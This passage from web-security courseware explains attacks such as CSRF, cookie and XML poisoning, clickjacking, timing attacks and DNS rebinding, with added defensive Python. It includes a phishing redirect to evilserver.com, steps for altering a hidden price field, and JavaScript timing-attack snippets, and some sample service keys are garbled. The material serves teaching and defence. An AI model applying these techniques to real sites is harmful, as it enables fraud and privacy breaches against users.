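Where a redirect to arbitrary third-party sites is a genuine feature, the usual alternative is an interstitial page that shows the destination and asks the user to confirm, so the trusted domain name is never lent to an unseen target.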
Security Management Exploits
Some attackers target security management systems, either in networks or in the application layer, to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.
Failure to Restrict URL Access
An application often safeguards or protects sensitive functionality and prevents the display of links or URLs for protection. Attackers access those links or URLs directly and perform illegitimate operations.
Malicious File Execution
Malicious file execution vulnerabilities are present in most applications. The cause of this vulnerability is unvalidated input to a web server. Thus, attackers execute and process files on a web server and initiate remote code execution, install a rootkit remotely, and, in at least some cases, take complete control of the systems.
In an "unvalidated redirect" scenario, a user receives a phishing email from an attacker, luring the user into clicking the link. The link (malicious query) appears to be legitimate because it contains the name of a legitimate website such as www.certifiedhacker.com at the beginning of the URL. However, the latter part of the link contains a malicious URL (www.evilserver.com), to which it redirects the victim. When the user clicks the link, it redirects to the www.evilserver.com website, and the server that hosts the website might perform illegal
Figure: Unvalidated Redirects and Forwards example
Watering Hole Attack
In a watering hole attack, the attacker identifies the kind of websites frequently surfed by a target company/individual and tests these websites to identify any possible vulnerabilities. Once the attacker identifies the vulnerabilities, he/she injects a malicious script/code into the web application that can redirect the web page and download malware onto the victim's machine. After infecting the vulnerable web application, the attacker waits for the victim to access the infected web application. This attack is called a watering hole attack, as the attacker waits for the victim to fall into the trap, similar to a lion waiting for its prey to arrive at a watering hole to drink water. When the victim surfs the infected website, the web page redirects him/her and downloads malware onto his/her machine, compromising the machine and indeed compromising the network/organization.
Cross-Site Request Forgery (CSRF) Attack
Cross-site request forgery (CSRF), also known as a one-click attack, occurs when a hacker instructs a user's web browser to send a request to the vulnerable website through a malicious web page. Finance-related websites commonly contain CSRF vulnerabilities. Usually, outside attackers cannot access corporate intranets; hence, CSRF is one of the methods used to enter these networks. The inability of web applications to differentiate a request made using malicious code from a genuine request exposes it to a CSRF attack. Such attacks exploit web page vulnerabilities that allow attackers to force unsuspecting users' browsers to send malicious requests that they did not intend to send. The victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects an HTTP request for the trusted site into the victim user's session, compromising its integrity.

In this scenario, the attacker constructs a malicious script and stores it on a malicious web server. When a user visits the website, the malicious script starts running and the attacker gains access to the user's browser.
Figure 14.32: Cross-Site Request Forgery (CSRF) attack example (trusted website, victim's browser, malicious website)
In a CSRF attack, the attacker waits for the user to connect with a trusted server and then tricks the user into clicking on a malicious link containing arbitrary code. When the user clicks on the link, it executes the arbitrary code on the trusted server. The diagram below explains the steps involved in a CSRF attack.
Figure 14.33: Working of Cross-Site Request Forgery (CSRF) attack
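The defence follows from the mechanism above: the browser attaches the victim's session cookie automatically, so a state-changing request must also carry something the malicious page cannot supply. As an added example (not from the courseware), a server-side gate that combines a session-bound synchronizer token with an Origin/Referer check; the trusted origin, the secret and the function names are assumptions:

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed for this example: the trusted site's origin and the server-side key.
TRUSTED_ORIGIN = "https://bank.example"
SERVER_SECRET = b"constructed-example-key-load-from-config"


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token embedded in the trusted site's forms. It is bound to the
    session with an HMAC, so a token from one session is useless in another, and
    it is never sent as a cookie, so the browser will not attach it to a request
    forged from another site."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), "sha256").hexdigest()
    return f"{nonce}.{mac}"


def csrf_token_valid(session_id: str, token: str) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), "sha256").hexdigest()
    return hmac.compare_digest(mac, expected)


def request_origin(headers: dict):
    """Origin the browser reports for the request. Browsers set Origin (or at least
    Referer) themselves; page script on the malicious site cannot forge them."""
    for name, value in headers.items():
        if name.lower() == "origin":
            return value.rstrip("/")
    for name, value in headers.items():
        if name.lower() == "referer":
            parts = urlsplit(value)
            return f"{parts.scheme}://{parts.netloc}"
    return None


def accept_state_change(session_id: str, headers: dict, form: dict):
    """Gate for any request that changes state (transfer, password change, ...).
    Returns (accepted, reason). A request forged from a malicious page carries
    the victim's session cookie but neither the trusted origin nor the token."""
    if request_origin(headers) != TRUSTED_ORIGIN:
        return False, "origin mismatch"
    if not csrf_token_valid(session_id, form.get("csrf_token", "")):
        return False, "missing or invalid csrf token"
    return True, "ok"
```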
Cookie/Session Poisoning
Cookies are generally used to maintain a session between web applications and users; thus, cookies need to transmit sensitive credentials frequently. The attacker can modify the cookies' information with ease to escalate access or assume the identity of another user. Usually, the aim of a session is to uniquely bind every individual with the web application he/she is accessing. Poisoning cookies and session information can allow an attacker to inject malicious content or modify the user's online experience and obtain unauthorized information.

Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. They exist as files stored in the client computer's memory or hard disk. A proxy can be used for rewriting the session data, displaying the cookie data, and/or specifying a new user ID or other session identifiers in the cookie. By modifying the data in a cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember me?" and store the user's information in a cookie so the user does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. To protect cookies, site developers often encode them. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet through 13 characters) give a false sense of security to the users who view cookies.

Threats

Compromised cookies and sessions can provide an attacker with access to accounts and allow the attacker to assume the identity of other users of an application. By assuming another user's online identity with user credentials, attackers can review the original user's purchase history, order new items, exploit services, and access the vulnerable web application.
One of the easiest examples involves using the cookie directly for authentication. Another method of cookie/session poisoning uses a proxy to rewrite the session data, displaying the cookie data and/or specifying a new user ID or other session identifiers in the cookie. There are four types of cookies: persistent, non-persistent, secure, and non-secure. Persistent cookies are stored on a disk, whereas non-persistent ones are stored in memory. Web applications transfer secure cookies only through SSL connections.

How Cookie Poisoning Works
Figure 14.34: Working of Cookie Poisoning (user browses a web page; web server replies with the requested page and sets a cookie on the user's browser; attacker obtains the cookie by sniffing or phishing; product is delivered to the attacker's address)
Web Service Attack
Similar to the way in which a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser. The evolution and increasing use of web services in businesses offer new attack vectors in an application framework. Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points, Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services, and Simple Object Access Protocol (SOAP) for communication between web services, which are vulnerable to various web application threats.

These web services have detailed definitions that allow regular users and attackers to understand the construction of the services. Thus, web services provide the attacker with much of the information required to fingerprint the environment to formulate an attack. Some examples of this type of attack are as follows:

1. An attacker injects a malicious script into a web service and can disclose and modify application data.

2. An attacker uses a web service for ordering products and injects a script to reset the quantity and status on the confirmation page to less than what he or she had originally ordered. Thus, the system processing the order request submits the order, ships the order, and then modifies the order to show that the company is shipping a smaller number of products, but the attacker ends up receiving more of the product than he or she pays for.
Figure 14.35: Web services stacks and attacks
Web Service Footprinting Attack
Attackers use the Universal Business Registry (UBR) as a major source to gather information about web services, as it is very useful for both businesses and individuals. It is a public registry that runs on UDDI specifications and SOAP. UBR is somewhat similar to a "Whois server" in functionality. To register web services on a UDDI server, businesses or organizations generally use one of the following structures:

businessEntity: holds detailed information about the company, such as company name and contact details.

businessService: a logical group of single or multiple web services. Every businessService structure is a subset of businessEntity. Each businessService outlines the technical and descriptive information about a businessEntity element's web service.

bindingTemplate: represents a single web service. It is a subset of businessService and it contains technical information that is required by a client application to bind and interact with a target web service.

technicalModel (tModel): takes the form of keyed metadata and represents unique concepts or constructs in UDDI.

Attackers can footprint a web application to obtain any or all of these UDDI information structures.
XML Query

POST /inquire HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction:
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.microsoft.com

<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
<Body>
<find_service generic="2.0" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_service>
</Body>
</Envelope>

HTTP/1.1 100 Continue
XML Response

HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 11:05:34 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1272

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<serviceList operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2">
<serviceInfos>
<serviceInfo serviceKey="6adé1201-2b7e-Sabe-c5aa-Scc6ab9de#43" businessKey="9112358ad-cl2d-1234-dded-c8e34e8a0aa6"><name xml:lang="en-us">Amazon Research Pane</name></serviceInfo>
<serviceInfo serviceKey="25638942-2d33-52£3-5896-cl2ca5632abe" businessKey="adeSe?3-abed-8£52-ca5e~1253adcefe2a"><name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo>
<serviceInfo serviceKey="adtaSc78-deGf-4562-d45c-aad45d4562ad" businessKey="28ddacd8-déSc~456a-4562-acde456740£5"><name xml:lang="en">Amazon.com Web Services</name></serviceInfo>
<serviceInfo serviceKey="ad52a456-4d5£-7dSe-Bdef-cSe6d456ed45" businessKey="45235896-256a-add55a456£12"><name xml:lang="en">AmazonBookPrice</name></serviceInfo>
<serviceInfo serviceKey="9acctSad-ASce-4dSc-1234-888cd4562893" businessKey="aa45238d-cd55~4d22-ed5d-a5Sadc43ad5c"><name xml:lang="en">AmazonBookPrice</name></serviceInfo>
</serviceInfos>
</serviceList>
</soap:Body>
</soap:Envelope>
Web Service XML Poisoning

XML poisoning is similar to an SQL injection attack. It has a higher success rate in a web service framework. Attackers insert malicious XML code in SOAP requests to perform XML node manipulation or XML schema poisoning to generate errors in XML parsing logic and break execution logic. Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings, which can be exploited for other web service attacks.

XML poisoning enables attackers to perform a DoS attack and compromise confidential information. As web services are invoked using XML documents, attackers poison the traffic between the server and browser applications by creating malicious XML documents to alter parsing mechanisms such as SAX and DOM, which web applications use on the server.
XML Request

<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>springfield</LastName>
<Address>apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>

Poisoned XML Request

<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>springfield</LastName>
<Address>apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>
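The poisoned request above repeats CustomerNumber and FirstName, which a lenient parser silently resolves to the first or the last value. As an added example (not from the courseware), a defensive parser for this CustomerRecord format that rejects duplicated or unexpected nodes, DTD/entity declarations and oversized documents before any business logic runs; the field schema, size limit and function names are assumptions:

```python
import xml.etree.ElementTree as ET
from collections import Counter

# Hypothetical schema for the request above: each field exactly once, plain text.
CUSTOMER_RECORD_FIELDS = {"CustomerNumber", "FirstName", "LastName",
                          "Address", "Email", "PhoneNumber"}
MAX_DOCUMENT_BYTES = 64 * 1024


class XmlPoisoningError(ValueError):
    """Raised when a request is rejected before it reaches business logic."""


def parse_customer_record(xml_text: str) -> dict:
    """Parse a CustomerRecord request defensively and return its fields."""
    if len(xml_text.encode("utf-8")) > MAX_DOCUMENT_BYTES:
        raise XmlPoisoningError("document too large")
    upper = xml_text.upper()
    # A data API has no use for DTDs: they bring external entities (file/TCP
    # access) and recursive entity expansion (parser DoS).
    if "<!DOCTYPE" in upper or "<!ENTITY" in upper:
        raise XmlPoisoningError("DTD and entity declarations are not accepted")
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        raise XmlPoisoningError(f"malformed XML: {exc}") from None
    if root.tag != "CustomerRecord":
        raise XmlPoisoningError(f"unexpected root element {root.tag!r}")
    counts = Counter(child.tag for child in root)
    duplicated = sorted(tag for tag, n in counts.items() if n > 1)
    if duplicated:
        raise XmlPoisoningError(f"duplicated elements: {duplicated}")
    unexpected = sorted(set(counts) - CUSTOMER_RECORD_FIELDS)
    if unexpected:
        raise XmlPoisoningError(f"unexpected elements: {unexpected}")
    missing = sorted(CUSTOMER_RECORD_FIELDS - set(counts))
    if missing:
        raise XmlPoisoningError(f"missing elements: {missing}")
    record = {}
    for child in root:
        if len(child) or child.attrib:
            raise XmlPoisoningError(f"{child.tag} must be a plain text node")
        record[child.tag] = (child.text or "").strip()
    if not record["CustomerNumber"].isdigit():
        raise XmlPoisoningError("CustomerNumber must be numeric")
    return record


def check_customer_record(xml_text: str):
    """Convenience wrapper: (True, record) or (False, reason)."""
    try:
        return True, parse_customer_record(xml_text)
    except XmlPoisoningError as exc:
        return False, str(exc)


# Constructed copies of the two requests shown above, plus a DTD variant.
GOOD_REQUEST = (
    "<CustomerRecord>"
    "<CustomerNumber>2010</CustomerNumber>"
    "<FirstName>Jason</FirstName>"
    "<LastName>springfield</LastName>"
    "<Address>apt 20, 3rd Street</Address>"
    "<Email>jason@springfield.com</Email>"
    "<PhoneNumber>6325896325</PhoneNumber>"
    "</CustomerRecord>"
)
POISONED_REQUEST = GOOD_REQUEST.replace(
    "<FirstName>Jason</FirstName>",
    "<FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>"
    "<FirstName>Jason</FirstName>", 1)
ENTITY_REQUEST = ('<!DOCTYPE CustomerRecord [<!ENTITY n "2010">]>'
                  + GOOD_REQUEST.replace("2010", "&n;"))
```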
Hidden Field Manipulation Attack

Attackers carry out hidden field manipulation attacks against e-commerce websites, as most of these sites have hidden fields in their price and discount specifications. In every client session, developers use hidden fields to store client information, including product prices and discount rates. During the development of such programs, developers feel that all their applications are safe; however, hackers can manipulate the product prices and even complete transactions with the altered prices. When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST). HTML can also store field values as hidden fields, which are not rendered on the screen by the browser but collected and submitted as parameters during form submissions. Attackers can examine the HTML code of the page and change the hidden field values to change post requests to the server.

Example

A particular mobile phone might be offered for $1000 on an e-commerce website, but the hacker, by altering some of the hidden text in its price field, purchases it for only $10. Such attacks result in severe losses for website owners, even though they might be using the latest anti-virus software, firewalls, IDS, and so on to protect their networks from attacks. Besides financial losses, the owners can also lose their market credibility. An example of such code is given below:
<form method="post" action="page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product" value="Certifiedhacker Shirt"><br>
Product price: 200.00<br>
</form>

1. Open the HTML page within an HTML editor.
2. Locate the hidden field (e.g., "<type=hidden name=price value=200.00>").
3. Modify its content to a different value (e.g., "<type=hidden name=price value=2.00>").
4. Save the HTML file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden field manipulation.
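Covering both the cookie/session poisoning section earlier and the hidden field steps above, an added example (not from the courseware): a signed session cookie that a proxy cannot edit without detection, a tamper-evident encoding for any value that must round-trip through the client, and a checkout that prices the order from a server-side catalog instead of the PRICE hidden field. The secret, the catalog and the function names are assumptions:

```python
import base64
import hashlib
import hmac
import secrets

# Constructed for this example; a real deployment loads and rotates this key.
SERVER_SECRET = b"constructed-example-secret"


def _mac(field_name: str, value: str) -> str:
    digest = hmac.new(SERVER_SECRET, f"{field_name}\0{value}".encode(),
                      hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).decode().rstrip("=")


def sign_field(field_name: str, value: str) -> str:
    """Tamper-evident encoding 'value.mac'. The MAC also covers the field name,
    so a signed value cannot be transplanted into a different field."""
    return f"{value}.{_mac(field_name, value)}"


def verify_field(field_name: str, signed: str):
    """Original value, or None if the MAC does not match (value edited, MAC
    edited, or Base64/ROT13-style 'encoding' that was never authenticated)."""
    value, sep, mac = signed.rpartition(".")
    if not sep:
        return None
    if hmac.compare_digest(mac, _mac(field_name, value)):
        return value
    return None


def new_session_cookie(user_id: str) -> str:
    """Cookie value: an unguessable random session ID plus the user it belongs
    to, signed as one unit, so neither part can be rewritten with a proxy."""
    session_id = secrets.token_urlsafe(24)
    return sign_field("session", f"{session_id}:{user_id}")


def user_from_cookie(cookie: str):
    """User ID carried by a cookie, or None if it was forged or altered."""
    value = verify_field("session", cookie)
    if value is None:
        return None
    _session_id, sep, user_id = value.partition(":")
    return user_id if sep and user_id else None


# Server-side price list (constructed). The client's PRICE field is never read.
CATALOG = {"Certifiedhacker Shirt": 200.00}


def checkout_total(form: dict) -> float:
    """Total for a posted order form; any PRICE hidden field is ignored."""
    product = form.get("product")
    if product not in CATALOG:
        raise ValueError("unknown product")
    quantity = int(form.get("quantity", "1"))
    if quantity < 1:
        raise ValueError("invalid quantity")
    return round(CATALOG[product] * quantity, 2)
```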
Web-based Timing Attacks
A web-based timing attack is a type of side-channel attack performed by attackers to retrieve sensitive information such as passwords from web applications by measuring the response time taken by the server. These attacks exploit side-channel leakage and estimate the amount of time taken for secret key operations. Different types of web-based timing attacks include direct timing attacks, cross-site timing attacks, and browser-based timing attacks.
Direct Timing Attack

Direct timing attacks are carried out by measuring the approximate time taken by the server to process a POST request, through which attackers can deduce the existence of a username. Similarly, attackers perform character-by-character password examination and exploit the timing information to determine the position where the password comparison failed. Then, attackers use this data to determine the target user's password.
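The direct timing attack works because a comparison that stops at the first mismatch, and a login path that returns early for unknown users, take measurably different time. As an added example (not from the courseware), the leaky comparison next to its constant-time form, and a login routine that performs the same work whether or not the username exists; the user store, passwords and function names are constructed:

```python
import hashlib
import hmac
import os


def prefix_dependent_equal(secret: bytes, guess: bytes):
    """The comparison a direct timing attack exploits. Returns (equal, steps):
    'steps' stands in for elapsed time and grows with the matching prefix, which
    is what lets an attacker recover one character at a time."""
    steps = 0
    if len(secret) != len(guess):
        return False, steps
    for a, b in zip(secret, guess):
        steps += 1
        if a != b:
            return False, steps
    return True, steps


def constant_time_equal(secret: bytes, guess: bytes) -> bool:
    """hmac.compare_digest's running time does not depend on where the inputs differ."""
    return hmac.compare_digest(secret, guess)


def _hash_password(password: str, salt: bytes) -> bytes:
    # iteration count kept low so the example runs quickly
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 1000)


# Constructed user store: username -> (salt, pbkdf2 hash).
_SALT_ALICE = os.urandom(16)
USERS = {"alice": (_SALT_ALICE, _hash_password("correct horse", _SALT_ALICE))}
# Dummy credential for unknown users, so that path costs the same as a real one.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash_password("unused", _DUMMY_SALT)


def login_leaky(username: str, password: str):
    """Returns (ok, hash_operations). Unknown users return at once, so the
    response time reveals whether a username exists."""
    if username not in USERS:
        return False, 0
    salt, stored = USERS[username]
    return _hash_password(password, salt) == stored, 1


def login_hardened(username: str, password: str):
    """Same interface; exactly one hash and one constant-time comparison on
    every path, whether or not the username exists."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = _hash_password(password, salt)
    matched = hmac.compare_digest(candidate, stored)
    return matched and username in USERS, 1
```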
Cross-site Timing Attack

A cross-site timing attack is another type of timing attack, in which attackers send crafted request packets to the website using JavaScript, unlike a direct timing attack, where the attacker himself/herself passes the request to a website. The attacker then analyzes the time consumed by the user to download the requested file. For instance, consider a website http://xyz.com that contains two separate groups such as /the-prompt/ and /the-anonymous-place/, and only the group members have access to the data fed into these groups. If any other person tries to access the group, an error message is generated. Now, when a user accesses an unknown website that contains malicious JavaScript injected by the attacker, the attacker can find out which group the user belongs to and thus violate his/her privacy.
Sample JavaScript code used to perform the attack:

function getMeasurement(url, callback) {
  var a = new Image();
  // the cross-origin load ends in an 'error' event either way; only its timing matters
  a.addEventListener('error', function() {
    var conclude = performance.now();
    callback(conclude - begin);
  });
  var begin = performance.now();
  a.src = url;
}

getMeasurement('http://xyz.com/the-prompt/', function(timeTDs) {
  getMeasurement('http://xyz.com/the-anonymous-place/', function(timeTF) {
    if (timeTF > timeTDs) {
      alert('The prompt is alright!');
    } else {
      alert('Privacy breach!');
    }
  });
});
Browser-based Timing Attacks

Browser-based timing attacks are sophisticated side-channel attacks. Rather than depending on the unsteady download time, attackers take advantage of side-channel leaks of a browser to estimate the time taken by the browser to process the requested resources. In this case, the time estimation begins immediately after the download of a resource and ceases once the processing is done.

Attackers can abuse different browser functionalities to launch further attacks such as video parsing attack and cache storage timing attack.
Video-parsing Attack

Sample JavaScript code used to perform this attack:

function getMeasurement(url, callback) {
  var p = document.createElement('video');
  var begin;
  // 'suspend' fires when the download stops; the timer starts there
  p.addEventListener('suspend', function() {
    begin = performance.now();
  });
  // 'error' fires once the browser fails to parse the resource as video
  p.addEventListener('error', function() {
    var conclude = performance.now();
    callback(conclude - begin);
  });
  p.src = url;
}
In contrast to cross-site timing attacks, here, the estimation time begins when the event "suspend" is triggered. The event is usually triggered when the resource downloading is stopped, as the requested resource is not an intended video; it is only a double- or triple-digit KB file. The event is also triggered when the resource download is completed. Subsequently, the browser attempts to parse the requested resource as a video. Certainly, the files HTML/JSON/... are invalid video formats; hence, the browser will raise an "error" event. Here, the attacker observes the amount of time the browser takes to process the resource and generate an error event. Single estimation for every end point might not always serve the purpose. Therefore, attackers try to accumulate several time estimations and calculate the median or average.
Cache Storage Timing Attack

The Cache API interface (used to load, fetch, and delete any responses) offers complete cache (memory) to the developers. Loading resources in the disk takes some amount of time based on the resource size. If attackers can estimate the time taken by the browser to perform this task, they can measure the corresponding response size.
Sample JavaScript code used to perform this attack:

function getMeasurement(url, callback) {
  fetch(url, {mode: 'no-cors', credentials: 'include'}).then(function(resp) {
    setTimeout(function() {
      var begin = performance.now();
      // storing the opaque response takes time proportional to its size
      caches.open('attackerfile').then(function(cache) {
        cache.put(new Request('myfoo'), resp.clone()).then(function() {
          var conclude = performance.now();
          callback(conclude - begin);
        });
      });
    }, 2000);
  });
}
After estimating or measuring the processing time using the abovementioned techniques, attackers can launch further attacks such as brute-force attacks to obtain complete information.
MarioNet Attack
MarioNet is a browser-based attack that runs malicious code inside the browser, and the infection persists even after closing or browsing away from the malicious web page through which the infection has spread. Most of the latest web browsers support a new API called Service Workers that allows the website to isolate operations that render the web page UI from intensive computational tasks to avoid freezing of the UI when large amounts of data are processed.

Attackers register and activate the Service Workers API through a website controlled by them. When the victim browses that website, the Service Workers API automatically activates, and it can run persistently in the background even when the user is not actively browsing the website. To keep the Service Workers API alive, attackers abuse the Service Workers SyncManager interface. Therefore, MarioNet can resist any tab crashes and power failures, increasing the attacker's potential to attack the browser. MarioNet leverages the abilities of JavaScript and depends on previously available HTML5 APIs. It can be used to create a botnet and launch other malicious attacks such as cryptojacking, DDoS, click fraud, and distributed password cracking. Furthermore, this attack allows attackers to inject malicious code into high-traffic websites for a short period, retrieve sensitive information such as user credentials, and then control the abused browsers from a central server.
Figure 14.36: Illustration of MarioNet attack (web browser with blocking extensions, web server, remote C&C)
Clickjacking Attack
A clickjacking attack is performed when the target website is loaded into an iframe element that is masked with a web page element that appears legitimate. The attacker performs this attack by tricking the victim into clicking on any malicious web page element that is placed transparently on the top of any trusted web page. Clickjacking is not a single technique; attackers leverage various attack vectors and techniques called UI redress attacks. They perform such attacks by exploiting the vulnerabilities caused by HTML iframes or improper configuration of the X-Frame-Options header. There are several variations of clickjacking attacks such as likejacking and cursorjacking. To perform these attacks, attackers send a link to the malicious website to the victim through email, social media, or any other media.

In clickjacking, the attacker loads the target website inside a low opacity iframe. Then, the attacker designs a page such that all the clickable items such as buttons are positioned exactly as on the selected target website. Now, the victim is tricked into clicking on the invisible controls or the deceptive UI elements that automatically trigger various malicious actions such as injecting malware, retrieving malicious web pages, retrieving sensitive information such as credit card details, transferring money from the victim's account, and buying products online.

The various clickjacking techniques employed by attackers are listed below:
Complete transparent overlay: In this technique, the transparent, legitimate page or tool page is overlaid on the previously designed malicious page. Then, it is loaded into an invisible iframe and the higher z-index value is assigned for positioning it on top.

Cropping: In this technique, only the selected controls from the transparent page are overlaid. This technique depends on the goal of the attack and may involve masking buttons with hyperlinks and text labels with false information, changing the button labels with wrong commands, and completely covering the legitimate page with misleading information while exposing only one original button.

Hidden overlay: In this technique, the attacker creates an iframe of 1x1 pixels containing malicious content placed secretly under the mouse cursor. When the user clicks on this cursor, it will be registered on the malicious page although the malicious content is concealed by the cursor.

Click event dropping: This technique can completely hide a malicious page behind a legitimate page. It can also be used to set the CSS pointer-events property of the legitimate page on top to none. This can cause click events to "drop" through the legitimate masked page, so that only the malicious page registers them.
Figure 14.37: Illustration of clickjacking attack (victim's browser opens the target web page masked by malicious web page elements)
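Since the attack depends on the target page being frameable, the check a defender wants is whether a response's headers actually forbid framing. As an added example (not from the courseware), an evaluator of X-Frame-Options and CSP frame-ancestors that applies the precedence rule current browsers use, plus the header pair to send; the function names are assumptions:

```python
def _header(headers: dict, name: str):
    """Case-insensitive header lookup."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def _csp_directive(csp: str, directive: str):
    """Source list of one CSP directive, or None if the directive is absent."""
    for part in csp.split(";"):
        tokens = part.strip().split()
        if tokens and tokens[0].lower() == directive:
            return tokens[1:]
    return None


def framing_protection(headers: dict) -> dict:
    """Assess whether a response can be loaded into another site's iframe.
    Returns {"protected": bool, "by": "csp" | "xfo" | None, "findings": [...]}.
    frame-ancestors takes precedence over X-Frame-Options when both are present."""
    findings = []
    csp = _header(headers, "Content-Security-Policy")
    xfo = _header(headers, "X-Frame-Options")
    if csp is not None:
        ancestors = _csp_directive(csp, "frame-ancestors")
        if ancestors is not None:
            # '*' or a bare scheme such as 'https:' lets any site frame the page
            if "*" in ancestors or any(src.endswith(":") for src in ancestors):
                findings.append("frame-ancestors permits any origin")
                return {"protected": False, "by": None, "findings": findings}
            if xfo is not None:
                findings.append("X-Frame-Options is ignored when frame-ancestors is set")
            return {"protected": True, "by": "csp", "findings": findings}
        findings.append("CSP present but has no frame-ancestors directive")
    if xfo is None:
        findings.append("neither X-Frame-Options nor frame-ancestors: page can be framed")
        return {"protected": False, "by": None, "findings": findings}
    value = xfo.strip().upper()
    if value in ("DENY", "SAMEORIGIN"):
        return {"protected": True, "by": "xfo", "findings": findings}
    if value.startswith("ALLOW-FROM"):
        findings.append("ALLOW-FROM is obsolete and ignored by current browsers")
    else:
        findings.append(f"invalid X-Frame-Options value {xfo!r}")
    return {"protected": False, "by": None, "findings": findings}


def recommended_headers(allowed_ancestor: str = "'none'") -> dict:
    """Headers to send: frame-ancestors for current browsers and X-Frame-Options
    as the fallback that older browsers understand."""
    fallback = "SAMEORIGIN" if allowed_ancestor == "'self'" else "DENY"
    return {"Content-Security-Policy": f"frame-ancestors {allowed_ancestor}",
            "X-Frame-Options": fallback}
```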
DNS Rebinding Attack
Attackers use the DNS rebinding technique to bypass the same-origin policy's security constraints, allowing the malicious web page to communicate with or make arbitrary requests to local domains. For instance, if a client is working for an organization, he/she mostly uses the internal or private network. Any external resources cannot be accessed inside that private network due to the same-origin policy (SOP). Hence, attackers cannot directly communicate with the local network due to restrictions in the SOP. Therefore, they use the DNS rebinding technique to circumvent this SOP security implementation.
How DNS Rebinding Works

An attacker creates a malicious website with the domain name certifiedhacker.com and registers it with the DNS server controlled by him/her. Now, the attacker configures the DNS server to send DNS responses with very short TTL values to avoid caching of the responses. Then, the attacker begins his/her intended operation with the HTTP server that contains the malicious website http://certifiedhacker.com.

When the victim opens the malicious website, the attacker's DNS server sends the IP address of the HTTP server that hosts the attacker-controlled website http://certifiedhacker.com. The web server responds with a page that runs JavaScript code in the victim's browser. Then, the JavaScript code accesses the website on the domain http://certifiedhacker.com to get additional resources from http://certifiedhacker.com/secret.html. When the browser runs the JavaScript, it makes a DNS request for the domain (owing to the short TTL configuration), but the attacker-controlled DNS server responds with a new IP. For instance, if the attacker-controlled DNS server responds with the private or internal IP of xyz.com, the victim's browser loads http://xyz.com/secret.html and not http://certifiedhacker.com/secret.html, successfully bypassing the SOP.
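Two places can break the sequence above: the internal web server, which still receives "Host: certifiedhacker.com" after the rebind, and the resolver, which can refuse private addresses for public names. As an added example (not from the courseware), both checks plus a two-lookup detector for the short-TTL public-then-private pattern; the internal names, zones, sample addresses and function names are constructed:

```python
import ipaddress

# Constructed for this example: names the internal web server answers to, and
# DNS zones whose records are expected to carry private addresses.
ALLOWED_HOST_HEADERS = {"intranet.example.internal", "10.0.0.5"}
INTERNAL_ZONES = ("example.internal",)
SHORT_TTL_SECONDS = 60


def host_header_allowed(host_header: str) -> bool:
    """First defence, on the internal web server: answer only for its own names.
    After rebinding, the victim's browser reaches the internal IP but still sends
    the attacker's domain in the Host header, so the request can be refused."""
    host = host_header.strip().lower()
    if host.startswith("["):                    # IPv6 literal, e.g. [::1]:8080
        host = host.split("]", 1)[0] + "]"
    elif host.count(":") == 1:                  # name:port
        host = host.split(":", 1)[0]
    return host in ALLOWED_HOST_HEADERS


def _is_internal_address(ip: str) -> bool:
    # private, loopback, link-local and reserved ranges are all non-global
    return not ipaddress.ip_address(ip).is_global


def _is_internal_name(name: str) -> bool:
    name = name.rstrip(".").lower()
    return any(name == zone or name.endswith("." + zone) for zone in INTERNAL_ZONES)


def filter_answers(name: str, answers: list):
    """Second defence, on the resolver (the idea behind dnsmasq's --stop-dns-rebind
    option): drop non-global addresses that a public name resolves to.
    Returns (kept, dropped)."""
    if _is_internal_name(name):
        return list(answers), []
    kept, dropped = [], []
    for ip in answers:
        (dropped if _is_internal_address(ip) else kept).append(ip)
    return kept, dropped


def looks_like_rebinding(name: str, ttl: int, first_answers: list,
                         second_answers: list) -> bool:
    """Detection over two successive lookups of the same public name: a public
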